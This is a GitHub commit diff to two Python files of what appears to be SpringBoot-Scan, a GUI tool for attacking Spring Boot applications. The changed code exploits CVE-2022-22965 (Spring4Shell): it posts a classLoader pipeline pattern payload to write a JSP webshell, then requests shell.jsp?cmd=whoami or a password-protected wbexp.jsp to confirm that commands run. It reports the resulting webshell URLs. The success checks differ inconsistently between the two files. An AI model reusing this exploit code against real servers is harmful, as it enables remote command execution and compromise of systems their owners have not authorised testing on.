Skip to content

Commit 4f051be

Browse files
authored
Add files via upload
1 parent eb4be1a commit 4f051be

File tree

2 files changed

+15
-7
lines changed

2 files changed

+15
-7
lines changed

SpringBoot-Scan-GUI-Linux.py

Lines changed: 11 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -830,17 +830,25 @@ def CVE_2022_22965(self, url, proxies):
830830
sleep(1)
831831
pattern_data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
832832
ret = requests.post(url, headers=post_headers, data=pattern_data, verify=False)
833-
back = "[+]Wirte Shell Response Code: %d" % ret.status_code
833+
back = "[+]Wirte Shell Response Code: %d 等待验证" % ret.status_code
834834
self.info_text.insert(tk.INSERT,back)
835835
self.info_text.insert(tk.INSERT, '\n')
836-
if Vule == "CVE-2022-22965":
836+
if filename == "shell":
837+
test = requests.get(url + filename +".jsp?cmd=whoami")
838+
elif filename == "wbexp":
839+
test = requests.get(url + filename +".jsp")
840+
if Vule == "CVE-2022-22965" and ('//' in str(test.text)):
837841
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?cmd=whoami"
838842
self.info_text.insert(tk.INSERT,back)
839843
self.info_text.insert(tk.INSERT, '\n')
840-
elif Vule == "22965-13exp-shell":
844+
elif Vule == "22965-13exp-shell" and ('13exp' in str(test.text)):
841845
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "wbexp.jsp?pwd=13exp&cmd=whoami"
842846
self.info_text.insert(tk.INSERT,back)
843847
self.info_text.insert(tk.INSERT, '\n')
848+
else:
849+
back = "[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址自行扫描"
850+
self.info_text.insert(tk.INSERT,back)
851+
self.info_text.insert(tk.INSERT, '\n')
844852
else:
845853
back = "[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址自行扫描"
846854
self.info_text.insert(tk.INSERT,back)

SpringBoot-Scan-GUI.py

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -835,23 +835,23 @@ def CVE_2022_22965(self, url, proxies):
835835
sleep(1)
836836
pattern_data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
837837
ret = requests.post(url, headers=post_headers, data=pattern_data, verify=False)
838-
back = "[+]Wirte Shell Response Code: %d" % ret.status_code
838+
back = "[+]Wirte Shell Response Code: %d 等待验证" % ret.status_code
839839
self.info_text.insert(tk.INSERT,back)
840840
self.info_text.insert(tk.INSERT, '\n')
841841
if filename == "shell":
842-
test = requests.get(url + filename +".jsp?whoami")
842+
test = requests.get(url + filename +".jsp?cmd=whoami")
843843
elif filename == "wbexp":
844844
test = requests.get(url + filename +".jsp")
845845
if Vule == "CVE-2022-22965" and ('root' in str(test.text)):
846846
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?cmd=whoami"
847847
self.info_text.insert(tk.INSERT,back)
848848
self.info_text.insert(tk.INSERT, '\n')
849-
elif Vule == "22965-13exp-shell" and ('13exp' in str(test.text)):
849+
elif Vule == "22965-13exp-shell" and ('//' in str(test.text)):
850850
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "wbexp.jsp?pwd=13exp&cmd=whoami"
851851
self.info_text.insert(tk.INSERT,back)
852852
self.info_text.insert(tk.INSERT, '\n')
853853
else:
854-
back = "[-] CVE-2022-22965漏洞不存在"
854+
back = "[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址自行扫描"
855855
self.info_text.insert(tk.INSERT,back)
856856
self.info_text.insert(tk.INSERT, '\n')
857857
else:

0 commit comments

Comments
 (0)